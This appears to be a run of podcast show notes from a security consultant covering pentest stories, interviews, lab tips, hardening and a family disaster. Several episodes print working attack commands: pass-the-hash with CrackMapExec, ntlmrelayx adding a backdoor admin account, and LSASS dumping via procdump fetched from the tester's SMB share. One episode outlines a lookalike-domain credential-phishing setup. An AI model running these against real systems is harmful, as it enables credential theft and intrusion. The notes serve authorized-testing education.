    • What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)

    • A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX

    • This handy script runs nmap against subnets, then Eyewitness, then emails the results to you

    • Early in the engagement I'd highly recommend checking for Kerberoastable accounts

    • I really like Multirelay to help me pass hashes, like:

    MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

    • Once you get a shell, run dump to dump hashes!

    • Then, use CME to pass that hash around the network!

    crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth

    • Then, check out this article to use NPS and get a full-featured shell on your targets

    7MS #389: Securing Your Family During and After a Disaster - Part 2 Nov 21, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about:

    • How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
      • New licenses
      • New ATM/credit cards
      • Rental vehicles
      • Temporary housing
    • How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect
    • What's it like working with the insurance machine? What do they help with and not help with?
    • How much does it suck to lose all your stuff? (Spoiler alert: a lot)
    • The relief (as weird as that sounds) that comes with losing all your material things

    Thanks again for your support via GoFundMe


    7MS #388: Securing Your Family During and After a Disaster - Part 1 Nov 15, 2019

    In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this:

    • Today: Talk about "day zero" - everything that happened on the day of the fire
    • Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
    • Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

    Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.


    7MS #387: How to Succeed in Business Without Really Crying - Part 7 Nov 11, 2019

    Today's episode features a few important changes to the tools and services I use to run 7MS:

    • Docusign is out and (sort of) replaced with Proposify
    • Voltage SecureMail is out and replaced by ShareFile
    • Ninite is rad for keeping mobile pentest dropboxes automatically updated!
    • Nessys_SortyMcSortleton has been updated to...you know...work

    Additionally, we talk about a few biz-specific challenges:

    • How do you (comfortably) talk about money with a client before the SOW hits their inbox?
    • If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

    7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4 Nov 01, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

    In today's episode we talk about:

    • Running into angry system admins (that are either too fired up or not fired up enough)
    • Being wrong without being ashamed
    • When is it necessary to make too much noice to get caught during an engagement?
    • What are the top 5 tools you run on every engagement?
    • How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
    • How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
    • How do you deal with colleagues who take findings as their own when they talk with management?
    • How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
    • What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
    • How could a fresh grad get into a red team job?
    • What do recruiters look for candidates seeking red team positions?
    • If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
    • What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
    • What's your favorite red team horror story?

    7MS #385: A Peek into the 7MS Mail Bag Oct 22, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to).

    Links to things discussed this episode:

    Wireless pentest certs:

    • SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
    • Offensive Security Wireless Professional

    Good/free pentest training options:

    • Pentester Academy
    • VulnHub
    • Rastalabs
    • The Cyber Mentor

    Free logging/alerting solutions for SMBs:

    • WEFFLES
    • Logging Made Easy
    • HELK
    • Wazuh

    7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns Oct 12, 2019

    In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

    • Consider this list of top 9 phishing simulators.
    • Check out GoPhish!
    • Then spin up a free tier Kali AWS box
    • Follow the instructions to install GoPhish and get it running on your AWS box
    • Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
    • Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
    • Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us):
    • Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
    • Have fun!!!

    7MS #383: Tales of Internal Network Pentest Pwnage - Part 10 Oct 01, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

    • Relayed one high-priv cred from one box to another
    • Dumped and cracked a local machine's hash
    • Passed that hash around the network
    • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
    • Set the wdigest flag via CrackMapExec

    Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

    mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share

    Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

    crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

    7MS #382: Tales of Internal Network Pentest Pwnage - Part 9 Sep 24, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network.

    This was an especially interesting one because the client had a lot of great security defenses in place, including:

    • Strong user passwords
    • A SIEM solution that appeared to be doing a great job

    We did some looking for pwnage opportunities such as:

    • Systems missing EternalBlue patch
    • Systems missing BlueKeep patch

    What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes.

    Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.


    7MS #381: DIY $500 Pentesting Lab Deployment Tips Sep 18, 2019

    For Windows VMs

    • Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
    • Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):
    powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot
    • To turn on remote desktop:
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    • To set the firewall to allow RDP:
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    • To stop the freakin' Windows hosts from going to sleep:
    powercfg.exe -change -standby-timeout-ac 0
    • To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
    setup64.exe /s /v "/qn reboot=r"
    • To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"

    For Linux VMs

    • Get SSH keys regenerated and install/run openssh server:
    apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service
    • Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update

    Next user group meeting September 30!


    7MS #380: Tales of Internal Network Pentest Pwnage - Part 8 Sep 05, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    Today's episode is a continuation of episode #379, where we:

    • Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
    • Sucked our nmap scans into Eyewitness
    • Captured and cracked some creds with Paperspace
    • Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

    Today, the adventure continues with:

    • Checking the environment for CVE-2019-1040
    • Picking apart the privileges on my "pseudo domain admin" account
    • Making a startling discovery about how almost all corp passwords were stored

    Enjoy!


    7MS #379: Tales of Internal Network Pentest Pwnage - Part 7 Aug 30, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

    • Review of setting up your DIY pentest dropbox
    • Choosing the right hardware (I'm partial to this NUC)
    • Running Responder to catch creds
    • Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
    • Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
    • Running Sharphound to get a map of the AD environment
    • Cracking creds with Paperspace
    • When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

    7MS #378: Interview with Zane West of Proficio Aug 22, 2019

    In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about:

    • How important is it to have an IT background before you jump into security?
    • How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
    • Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
    • Why in the world does it take twenty seven people to run a SOC?!
    • When should an organization consider engaging an MSSP to help them with their security needs?
    • What if your MSP also provides MSSP services? Is that a good or bad thing?
    • What are some tips for successfully deploying a SIEM?
    • What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

    7MS #377: DIY Pentest Dropbox Tips Aug 16, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series.

    Here are some of the pain points I cover today:

    • Turn the firewall off Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.

    • Disable Windows Defender Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.

    • Disable power sleep settings To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled

    • Create a second disk on the Windows management VM and install BitLocker to Go

    Check out today's show notes at 7ms.us for more info!


    7MS #376: Tales of SQL Injection Pwnage Aug 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

    We cover a lot of ground today on a variety of topics:

    • I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.

    • I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers.

    • I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help:

      • Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
      • Install CO2 from the BApp store
      • When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
      • Grab a copy of sqlmap
      • Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:

    (See today's show notes on the 7MS Web site for more information!)


    7MS #375: Tales of Pentest Fail #3 Aug 02, 2019

    I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too.

    Today's takeaways include:

    • Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time.
    • If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears
    • Checking for DNS zone transfers is a good idea!

    7MS #374: Tales of Internal Pentest Pwnage - Part 6 Jul 24, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles.

    Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00)


    7MS #373: Tales of Pentest Fail #2 Jul 19, 2019

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)


    7MS #372: Tales of Internal Pentest Pwnage - Part 5 Jul 15, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

    Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

    • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
    opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

    Source: Pwning internal networks automagically

    • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
    net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

    So the full command would be:

    ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

    Check today's show notes at https://7ms.us for more information!


    7MS #371: Tales of Internal Pentest Pwnage - Part 4 Jul 12, 2019

    Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

    Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:

    • Having separate accounts for day-to-day operations and administrative/privileged tasks
    • Local Administrator account largely disabled across the enterprise
    • Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
    • Hard-to-crack passwords!

    Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!


    7MS #370: Happy Secure 4th! Jul 03, 2019

    Hey folks, happy secure 4th o' July!

    In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include:

    • NPK, which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress!

    • Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up.

    • Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song. If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.


    7MS #369: Cracking Hashes with NPK Jun 28, 2019

    Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today I'm having a blast with cracking hashes quickly and cost-effectively using NPK.

    For 1+ years I've loved my Paperspace config, but lately I've had some reservations about it:

    • People are telling me they're having problems installing the drivers
    • My methodology for building wordlists with HateCrack doesn't seem to work anymore
    • I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything.

    This week on a pentest I wasn't capturing many hashes, and when I finally did it was a really valuable one. So I wanted to throw more "oomph" at the hash but don't have a ton of days to spare.

    Enter NPK which lets you submit a hash, decide how much horsepower to throw at it, and even set a max amount of $ to spend on the effort. Super cool! I'm loving it so far!

    Note: I did have a heck of a time with the install (I'm sure it was a me thing) so I wrote up this gist to help others who might hit the same issue:

    Happy crackin'!


    7MS #368: Tales of Pentest Fail Jun 24, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    In today's episode, I toss myself under the proverbial security bus and share a tale of pentest fail. Looking back, I think the most important lessons learned were:

    • Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote.

    • Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency.

    • Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.


    7MS #367: DIY Two-Hour Risk Assessment Jun 17, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Hey! I'm on the road again - this time with a tale encompassing:

    1. How to conduct a mini risk assessment in just two hours. Some ways to consider adding value :

      • A discussion of administrative and physical controls
      • Create a network inventory using nmap and Eyewitness
      • Conduct an external vulnerability scan with Nessus or OpenVAS
    2. How a guy with a gun turned a four-hour road trip into an epic eight hour adventure.

    Enjoy :-)


    7MS #366: Tales of Internal Pentest Pwnage - Part 3 Jun 16, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major stories (probably not in order of importance):

    1. Why I had two get two haircuts in under and hour (spoiler: it's so I didn't look like an idiot for my client)!

    2. An internal pentesting pwnage story - including network and physical security this time around!

    Enjoy!


    7MS #365: Interview with Ryan Manship and Dave Dobrotka - Part 3 May 30, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    First, a bit of miscellany:

    • If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands!

    • If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!

    Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover:

    • Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective!

    • Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?

    I also asked the questions folks submitted to me via LinkedIn/Slack:

    • Any tips for the most dreaded part of an assessment (reports)?

    • How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?

    • What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)

    • What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!").

    • Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?


    7MS #364: Tales of External Pentest Pwnage May 23, 2019

    This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

    This episode features cool things I'm learning about external pentesting. But first, some updates:

    • My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.

    • The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking!

    • Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.

    On the external pentest front, here are some items we cover in today's show:

    • MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!

    • Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

    crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN

    You can also find what shares you have access to with:

    crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN --shares

    Sift through those shares! They often have VERY delicious bits of information in them :-)


    7MS #363: Interview with Ryan Manship and Dave Dobrotka - Part 2 May 15, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Yuss! It's true! Dave and Ryan are back!

    Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers.

    In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like:

    • Who should have a red team exercise conducted? Who NEEDS one?

    • How do you choose an objective that makes sense?

    • What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!

    • What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?

    • How do you attack a high-security bunker?!

    • How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?


    7MS #362: My Dear Friend Impostor Syndrome May 09, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I get ready to speak at Secure360 next week (insert wah-wah-waaaaaaahhhhhhh here).

    How do you deal with impostor syndrome? Personally, I'm finding some success in squashing it by forcing myself into situations where I feel like a fraud - over and over again! Over time, I feel slightly less like a sham and a bit more like I know what I'm talking about. Specifically, in this episode I talk about:

    • The thrill of getting a presentation accepted at a conference, and the dread and fear that follows
    • The awful nightmare I have the night before I speak in front of others
    • Shaking off nerves when your talk is accompanied by a sign language interpreter
    • Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can

    I also share the outline to my "So You Wanna Start a Security Company?" talk, which includes:

    • What are the telltale signs that you should start a security company?
    • How do you find business when everybody and their mom seems to have a security offering?
    • What are some of the tools/services/people that can help your business succeed?

    7MS #361: Logging Made Easy May 03, 2019

    Today we're talking about Logging Made Easy, a project that, as its name implies...makes Windows endpoint logging easy! I love it. It offers a simple, digestible walkthrough of several short "chapters" to get started. These chapters include:

    Chapter 1 - Set up Windows Event Forwarding

    Chapter 2 – Sysmon Install

    Chapter 3A – Database (Easy Method)

    Chapter 3B – Database (Manual Method)

    Chapter 4 - Post Install Actions

    Besides having a small issue with a batch script (resolved as of 5/3) and a another snafu (that's probably my fault), it's a simple and effective way to get logging spun up in your environment!


    7MS #360: Active Directory Security 101 - Part 2 Apr 25, 2019

    This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime. For more information, visit netwrix.com.

    In today's program we continue a series on fundamental Active Directory security that we started back in episode 327. I took all the things I talked about in that episode, as well as the new additions discussed today:

    • Finding your most vulnerable AD abuse paths with BloodHound. For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354.

    • Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective.

    • How to de-escalate local admins (and prevent them from over-using/abusing the use of their privileged account)

    • Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging setup in your environment. Can't wait for a good lab day to play!

    Here are ALL the AD Security 101 tips in a delicious [gist].


    7MS #359: Windows 10 Security Baselining Apr 19, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening standard and/or baseline. Specifically, I cover:

    • NIST STIG for Windows 10
    • Heimdal Security - Windows 10 Hardening Guide
    • Center for Internet Security's security benchmarks
    • Windows Security Compliance Toolkit (SCT)

    I think one path to success is to use the Windows SCT as a way to create a baseline, and then use it - plus some of the other guides and standards - to gradually turn the security screws on the OS. Don't just import a GPO template and turn on 123,456,789 settings at once. You'll likely bring the network to its knees!

    Got a better/faster/stronger way to accomplish baselining? Let me know!


    7MS #358: 4 Ways to Write a Better Pentest Report Apr 16, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of reports from other companies, and here are a few key problems I see with them:

    1. Too long - overall these things are waaAAaAaaAayyyYYYYYYyyy too long. I see reports where the analyst has copied and pasted an entire Nessus report into the main report. Yikes. That makes these things weigh in at hundreds(!) of pages.
    2. Too techie - these reports look like their written from one techie to another. Nothing wrong with that, really, however in many cases the key person that needs to "get it" is a manager or C-level position who needs to understand the risks in plain English.
    3. No narrative - the reports are just a long laundry list of vulnerabilities without any context of how the pentest was conducted or which vulns should be fixed first.
    4. Weak remediation - most of the findings are accompanied by whatever remediation instructions are provided by the vuln-scanner or other tool. We can do better than this!

    How? Listen to today's episode :-).

    Oh, and don't forget to come to the next 7MS User Group meeting on Monday, April 22! Details here!


    7MS #357: 7 Minutes of IT and Security Tips Apr 11, 2019

    Today I'm launching an ongoing series called 7MOIST. It stands for:

    • 7
    • Minutes
    • of
    • IT
    • and
    • Security
    • Tips

    The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long!

    I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes, you'd be right.

    Basically, this is my way of going old school and getting back my podcast "roots" by delivering an episode before we had an intro jingle, interviews, sponsors, banter about hot cocoas or an outro song. Nothing but delicious content today friends, Enjoy!

    Today's theme is:

    Windows command line shortcuts and tips: Creative ways to play with cmd

    Basically, you can do Windows Key + R then type cmd and Enter for quick access to command line.

    But lets do some more fun stuff. Wanna open a command window from the desktop and launch a command in one swoop? Try this:

    cmd /k

    For example:

    cmd /k ping 192.168.0.1

    The cmd /k part opens a command window, and then ping 192.168.0.1 can be whatever command you also want to run on the fly.

    And if you want to start programs and/or open files right from the command line, you can do that (in most cases) by just typing the program name, like:

    notepad

    Or, get really fancy and add a document name after the command. For example:

    notepad meow.txt

    If meow.txt doesn't exist, Notepad will simply ask you to create it!

    Finding files faster

    Call me crazy, but the Windows find/search feature sometimes doesn't find stuff that I know is there. So I still like using old school DOS commands for this. I might do something like:

    cd \ dir /s *brian*.doc

    The dir stands for directory, and the /s tells the system to search recursively.

    See 7ms.us for the rest of today's show notes!


    7MS #356: Faster Hard Drive Forensics with CyLR and CDQR Apr 03, 2019

    This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

    In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on today's podcast include:

    • Forensics 101 - a talk I did for the 7MS user group in January

